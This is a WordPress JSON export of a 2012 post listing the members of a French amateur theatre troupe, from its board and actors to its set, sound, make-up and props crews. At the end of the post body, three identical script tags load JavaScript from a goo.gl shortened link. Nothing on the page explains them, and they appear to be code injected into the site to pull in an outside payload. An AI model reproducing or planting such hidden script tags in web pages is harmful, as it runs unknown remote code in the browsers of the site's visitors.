{"id":55,"date":"2012-12-30T10:01:02","date_gmt":"2012-12-30T09:01:02","guid":{"rendered":"http:\/\/theatrepourrire.com\/?p=55"},"modified":"2013-11-23T16:49:01","modified_gmt":"2013-11-23T15:49:01","slug":"membres-du-tpr-2012","status":"publish","type":"post","link":"https:\/\/theatrepourrire.com\/?p=55","title":{"rendered":"Membres du TPR 2012"},"content":{"rendered":"<p>Pour la saison 2012, notre association est compos\u00e9e comme suit :<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/p>\n<ul>\n<li><b><span style=\"text-decoration: underline;\">Le Bureau<\/span> :<\/b>\n<ul>\n<li><b>Pr\u00e9sidente :\u00a0<\/b>\u00a0Annie DOMPNIER<\/li>\n<li><b>Tr\u00e9sorier :\u00a0<\/b>\u00a0Roland VIBERT<\/li>\n<li><b>Secr\u00e9taire :\u00a0<\/b>\u00a0Andr\u00e9 LASSAGNE<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/p>\n<ul>\n<li><b>Metteur en sc\u00e8ne :<\/b>\u00a0Annie DOMPNIER<\/li>\n<li><b>Com\u00e9diens, par ordre d&rsquo;entr\u00e9e en sc\u00e8ne :<\/b>\n<ul>Denis LACROIX<\/ul>\n<ul>Annie DOMPNIER<\/ul>\n<ul>Michel LAPIERRE<\/ul>\n<ul>Marie LANGLOIS OU Samantha GLICERI<\/ul>\n<ul>Jean-Luc VACHER<\/ul>\n<ul>Roseline BOURDON<\/ul>\n<ul>Colette LASSAGNE<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li><b>L&rsquo;\u00e9quipe des d\u00e9corateurs :<\/b><b>Chef d\u00e9corateur et Maquettiste: \u00a0<\/b>Roland FOURRIER<b><br \/>\n<\/b><br \/>\n<b>D\u00e9corateurs :\u00a0<\/b><\/p>\n<ul>Henri CHALLIER<\/ul>\n<ul>Pierre VELLARD<\/ul>\n<ul>Pierre PREVOSTO<\/ul>\n<ul>Jean PACCARD<\/ul>\n<ul>Ren\u00e9 JALABERT<\/ul>\n<ul>Robert JOURNET<\/ul>\n<ul>Henri GENTY<\/ul>\n<ul>J.claude CUSAC<\/ul>\n<ul>Robert JOURNET<\/ul>\n<ul>Raymond FENESTRAZ<\/ul>\n<ul>Patrice CHEVASSU<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li><b>Son et lumi\u00e8res :<\/b>\n<ul>Jean-Michel BERTIN<\/ul>\n<ul>Emmanuel CURT<\/ul>\n<ul>Aur\u00e9lie CURT<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li><b>Maquilleuses :<\/b>\n<ul>Colette LASSAGNE<\/ul>\n<ul>Janine HENRY<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li><b>Accessoiristes : \u00a0<\/b>Laurence GIRARDIN<\/li>\n<\/ul>\n<p>Avec la participation de :<\/p>\n<ul>\n<li><b>Photographe :\u00a0<\/b>Pierre LACHAUD<\/li>\n<li><b>Webmaster :\u00a0<\/b>Aurore PERRET<\/li>\n<\/ul>\n<p><b style=\"line-height: 24px; font-size: 16px;\">\u00a0<\/b><\/p>\n<p>&nbsp; <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pour la saison 2012, notre association est compos\u00e9e comme suit : &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; Le Bureau : Pr\u00e9sidente :\u00a0\u00a0Annie DOMPNIER Tr\u00e9sorier :\u00a0\u00a0Roland VIBERT Secr\u00e9taire :\u00a0\u00a0Andr\u00e9 LASSAGNE &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; Metteur en sc\u00e8ne :\u00a0Annie DOMPNIER Com\u00e9diens, par ordre d&rsquo;entr\u00e9e en sc\u00e8ne : Denis LACROIX Annie DOMPNIER Michel LAPIERRE Marie LANGLOIS OU Samantha GLICERI Jean-Luc VACHER&#8230; <a class=\"continue-reading-link\" href=\"https:\/\/theatrepourrire.com\/?p=55\">Continuer \u00e0 lire <span class=\"meta-nav\">&rarr; <\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[8,3],"tags":[],"class_list":["post-55","post","type-post","status-publish","format-standard","hentry","category-archives","category-tpr"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/theatrepourrire.com\/index.php?rest_route=\/wp\/v2\/posts\/55","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/theatrepourrire.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/theatrepourrire.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/theatrepourrire.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/theatrepourrire.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=55"}],"version-history":[{"count":0,"href":"https:\/\/theatrepourrire.com\/index.php?rest_route=\/wp\/v2\/posts\/55\/revisions"}],"wp:attachment":[{"href":"https:\/\/theatrepourrire.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=55"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/theatrepourrire.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=55"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/theatrepourrire.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=55"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}